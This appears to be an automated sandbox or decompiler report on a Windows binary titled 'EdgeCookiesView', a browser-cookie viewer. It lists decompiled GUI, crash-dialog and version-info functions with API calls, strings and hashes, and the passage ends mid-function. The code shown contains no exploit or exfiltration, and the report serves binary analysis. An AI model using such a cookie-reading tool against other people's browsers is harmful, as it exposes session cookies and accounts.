				 *(_t187 + 0x214) = _t125;
				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
				_t131 = E00402DE1(__fp0);
				 *(_t229 + 0x70) = _t131;
				ImageList_Add( *(_t229 + 0x74), _t131, 0);
				DeleteObject( *(_t229 + 0x70));
				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
				_t218 = 0x50810809;
				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
					_t218 = 0x50811809;
				}
				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
				_t193 =  *(_t139 + 0x2e0);
				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
				if(_t193 <= 0) {
					L5:
					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
					E004099C4(_t221);
					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
					_t222 = 0x68;
					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
					_t233 = _t232 + 0xc;
					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
					asm("sbb eax, eax");
					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
					 *( *(_t187 + 0x698)) = 1;
					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
					_t241 =  *0x4134e0; // 0x0
					if(_t241 == 0) {
						E00405812(0x4134e0);
						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
							GetTempPathW(0x104, 0x4134e0);
						}
					}
					_t225 = wcslen(0x4134e0);
					 *_t233 = L"report.html";
					_t105 = wcslen(??) + 1; // 0x1
					_t243 = _t225 + _t105 - 0x104;
					if(_t225 + _t105 >= 0x104) {
						 *((short*)(_t187 + 0x288)) = 0;
					} else {
						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
					}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}

0x0040a743
0x0040a747
0x0040a74d
0x0040a756
0x0040a75a
0x0040a75d
0x0040a760
0x0040a763
0x0040a766
0x0040a76c
0x0040a76d
0x0040a76e
0x0040a775
0x0040a77c
0x0040a780
0x0040a783
0x0040a786
0x0040a78e
0x0040a78f
0x0040a790
0x0040a797
0x0040a79e
0x0040a7a2
0x0040a7a5
0x0040a7a8
0x0040a7b0
0x0040a7b1
0x0040a7b2
0x0040a7b9
0x0040a7c0
0x0040a7c4
0x0040a7c7
0x0040a7ca
0x0040a7cf
0x0040a7d6
0x0040a7d7
0x0040a7d8
0x0040a7df
0x0040a7e6
0x0040a7ea
0x0040a7ed
0x0040a7f0
0x0040a7f8
0x0040a7f9
0x0040a7fa
0x0040a7fd
0x0040a804
0x0040a808
0x0040a80b
0x0040a80e
0x0040a816
0x0040a817
0x0040a818
0x0040a81f
0x0040a826
0x0040a82a
0x0040a82d
0x0040a830
0x0040a838
0x0040a83b
0x0040a83c
0x0040a83d
0x0040a842
0x0040a84f
0x0040a86a
0x0040a882
0x0040a888
0x0040a8c4
0x0040a8d0
0x0040a8d3
0x0040a8dd
0x0040a8e0
0x0040a8e9
0x0040a8fe
0x0040a900
0x0040a906
0x0040a90c
0x0040a911
0x0040a913
0x0040a913
0x0040a94f
0x0040a954
0x0040a95a
0x0040a962
0x0040a96e
0x0040a971
0x0040a99a
0x0040a9a6
0x0040a9ac
0x0040a9b4
0x0040a9d1
0x0040a9d9
0x0040a9ea
0x0040a9ff
0x0040aa05
0x0040aa22
0x0040aa27
0x0040aa39
0x0040aa4c
0x0040aa58
0x0040aa64
0x0040aa70
0x0040aa75
0x0040aa81
0x0040aa83
0x0040aa91
0x0040aa99
0x0040aa99
0x0040aa91
0x0040aaa5
0x0040aaa7
0x0040aab3
0x0040aab7
0x0040aabd
0x0040aad8
0x0040aabf
0x0040aacf
0x0040aad5
0x0040aae9
0x0040aaea
0x0040aaef
0x0040aaf1
0x0040ab01
0x0040ab07
0x0040ab13
0x0040ab1b
0x0040ab37
0x0040ab3e
0x0040ab45
0x0040ab58
0x0040ab6d
0x0040a973
0x0040a973
0x0040a976
0x0040a979
0x0040a98a
0x0040a98f
0x0040a992
0x0040a995
0x0040a995
0x0040a995
0x00000000
0x0040a979

APIs

Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02

SetMenu.USER32(?,00000000), ref: 0040A84F
CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888

Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042

CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA

Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36

ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
DeleteObject.GDI32(?), ref: 0040A8E9
SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
CreateWindowExW.USER32 ref: 0040A940
GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
memcpy.MSVCRT ref: 0040AA22
ShowWindow.USER32(?,?), ref: 0040AA58
GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
wcslen.MSVCRT ref: 0040AAA0
wcslen.MSVCRT ref: 0040AAAE
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58

Strings

/nosaveload, xrefs: 0040A9E5
4A, xrefs: 0040AA7C
report.html, xrefs: 0040AAA7, 0040AABF
SysListView32, xrefs: 0040A93A
commdlg_FindReplace, xrefs: 0040AB08

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
API String ID: 945479791-4224175941
Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004010C7, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x412f50;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00405B17(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x412fd0;
								if( *0x412fd0 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x412fd0;
									if( *0x412fd0 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x004010c7
0x004010ca
0x004010cb
0x004010cf
0x004010d7
0x004010d9
0x004012a4
0x004012ac
0x004012e7
0x004012ae
0x004012c7
0x004012d6
0x004012d6
0x004012f5
0x0040130d
0x0040131e
0x00401320
0x0040132a
0x00000000
0x004010df
0x004010df
0x004010e0
0x00401265
0x0040126a
0x0040126d
0x00401271
0x0040127d
0x0040127d
0x00401280
0x00000000
0x00401286
0x0040128d
0x00401299
0x00000000
0x00401299
0x00401273
0x00401273
0x00401277
0x00000000
0x00000000
0x00000000
0x00000000
0x00401277
0x004010e6
0x004010e6
0x004010e9
0x00401215
0x00401217
0x0040121a
0x00401242
0x0040124a
0x00000000
0x00401250
0x00401258
0x0040125a
0x0040125d
0x00000000
0x00401263
0x00000000
0x00401263
0x0040125d
0x0040121c
0x0040121c
0x00401221
0x0040122f
0x00401237
0x00401237
0x004010ef
0x004010ef
0x004010f4
0x00401185
0x0040118e
0x0040119c
0x0040119f
0x004011a2
0x004011a4
0x004011a7
0x004011b4
0x004011b6
0x004011b9
0x004011d8
0x004011e0
0x00000000
0x004011e6
0x004011ee
0x004011f0
0x004011fb
0x004011fd
0x004011ff
0x00000000
0x00401205
0x00000000
0x00401205
0x004011ff
0x004011bb
0x004011bb
0x004011cd
0x00000000
0x004011cd
0x004010fa
0x004010fc
0x00401331
0x00401331
0x00401331
0x00401102
0x00401102
0x0040110b
0x00401119
0x0040111c
0x0040111f
0x00401121
0x00401124
0x00401136
0x00401151
0x00401159
0x00000000
0x0040115f
0x00401167
0x00401169
0x00401174
0x00401176
0x00401178
0x00000000
0x0040117e
0x0040117e
0x00000000
0x0040117e
0x00401178
0x00401138
0x0040113e
0x0040113f
0x0040113f
0x00401142
0x00401149
0x0040114b
0x0040114b
0x00401136
0x004010fc
0x004010f4
0x004010e9
0x004010e0
0x00401337

APIs

GetDlgItem.USER32 ref: 0040111F
ChildWindowFromPoint.USER32 ref: 00401131
GetDlgItem.USER32 ref: 00401167
ChildWindowFromPoint.USER32 ref: 00401174
GetDlgItem.USER32 ref: 004011A2
ChildWindowFromPoint.USER32 ref: 004011B4
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004011BD
LoadCursorW.USER32(00000000,00000067), ref: 004011C6
SetCursor.USER32(00000000,?,?), ref: 004011CD
GetDlgItem.USER32 ref: 004011EE
ChildWindowFromPoint.USER32 ref: 004011FB
GetDlgItem.USER32 ref: 00401215
SetBkMode.GDI32(?,00000001), ref: 00401221
SetTextColor.GDI32(?,00C00000), ref: 0040122F
GetSysColorBrush.USER32(0000000F), ref: 00401237
GetDlgItem.USER32 ref: 00401258
EndDialog.USER32(?,?), ref: 0040128D
DeleteObject.GDI32(?), ref: 00401299
GetDlgItem.USER32 ref: 004012BE
ShowWindow.USER32(00000000), ref: 004012C7
GetDlgItem.USER32 ref: 004012D3
ShowWindow.USER32(00000000), ref: 004012D6
SetDlgItemTextW.USER32 ref: 004012E7
SetWindowTextW.USER32(?,EdgeCookiesView), ref: 004012F5
SetDlgItemTextW.USER32 ref: 0040130D
SetDlgItemTextW.USER32 ref: 0040131E

Strings

EdgeCookiesView, xrefs: 004012ED

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: EdgeCookiesView
API String ID: 829165378-2656830938
Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C7, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040E340(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00405B17(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00405D33( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00405D33( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E0040591F();
					__eflags = _t64;
					if(_t64 == 0) {
						E0040C9D6();
					} else {
						E0040CA5A();
					}
					__eflags =  *0x41325c; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x412674; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x4128ec = 0;
						E0040CBD8(_t105, __eflags);
						__eflags =  *0x4128ec; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x4128f0, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x4128ec; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00405888( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x413260; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x412450);
							_push( *0x41245c);
							_push( *0x41244c);
							_push( *0x412434);
							_push( *0x412438);
							_push( *0x412440);
							_push( *0x412444);
							_push( *0x41243c);
							_push( *0x412448);
							_push( &_v1580);
							_push( *0x412674);
							_push( *0x412668);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040DFD6();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x0040c0cf
0x0040c0d7
0x0040c0df
0x0040c162
0x0040c176
0x0040c17d
0x0040c184
0x0040c19d
0x0040c19f
0x0040c1b2
0x0040c1b8
0x0040c1c6
0x0040c1cc
0x0040c1df
0x0040c1e6
0x0040c1f7
0x0040c1fe
0x0040c203
0x0040c206
0x0040c218
0x0040c225
0x0040c229
0x0040c22b
0x0040c22d
0x0040c23e
0x0040c244
0x0040c244
0x0040c25b
0x0040c25d
0x0040c25f
0x0040c26f
0x0040c275
0x0040c275
0x0040c276
0x0040c27b
0x0040c27d
0x0040c286
0x0040c27f
0x0040c27f
0x0040c27f
0x0040c28b
0x0040c291
0x0040c29b
0x0040c2a8
0x0040c2ae
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c3
0x0040c2c4
0x0040c2ca
0x0040c2cf
0x0040c2d7
0x0040c2ea
0x0040c2ef
0x0040c2f2
0x0040c2f8
0x0040c30d
0x0040c313
0x0040c2f8
0x00000000
0x0040c293
0x0040c293
0x0040c299
0x0040c314
0x0040c31a
0x0040c321
0x0040c322
0x0040c32e
0x0040c334
0x0040c33a
0x0040c340
0x0040c346
0x0040c34c
0x0040c352
0x0040c358
0x0040c35e
0x0040c35f
0x0040c36b
0x0040c371
0x0040c376
0x0040c37b
0x0040c37c
0x0040c394
0x0040c3a5
0x0040c3ab
0x0040c3b1
0x0040c3b1
0x00000000
0x0040c299
0x0040c291
0x0040c0e2
0x0040c0e8
0x0040c0f3
0x0040c116
0x0040c124
0x0040c13f
0x0040c142
0x0040c14e
0x0040c156
0x0040c156
0x0040c116
0x0040c0f3
0x00000000

APIs

EndDialog.USER32(?,?), ref: 0040C10C
GetDlgItem.USER32 ref: 0040C124
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040C142
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0040C14E
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040C156
memset.MSVCRT ref: 0040C17D
memset.MSVCRT ref: 0040C19F
memset.MSVCRT ref: 0040C1B8
memset.MSVCRT ref: 0040C1CC
memset.MSVCRT ref: 0040C1E6
memset.MSVCRT ref: 0040C1FE
GetCurrentProcess.KERNEL32 ref: 0040C206
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040C229
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040C25B
memset.MSVCRT ref: 0040C2AE
GetCurrentProcessId.KERNEL32 ref: 0040C2BC
memcpy.MSVCRT ref: 0040C2EA
wcscpy.MSVCRT ref: 0040C30D
_snwprintf.MSVCRT ref: 0040C37C
SetDlgItemTextW.USER32 ref: 0040C394
GetDlgItem.USER32 ref: 0040C39E
SetFocus.USER32(00000000), ref: 0040C3A5

Strings

{Unknown}, xrefs: 0040C191
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE36, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040DE36(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E0040674D(__edi);
					_push(_v8);
					L0040E038();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x6cdfe853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900006c
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0xfee850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0x38680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040fa
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
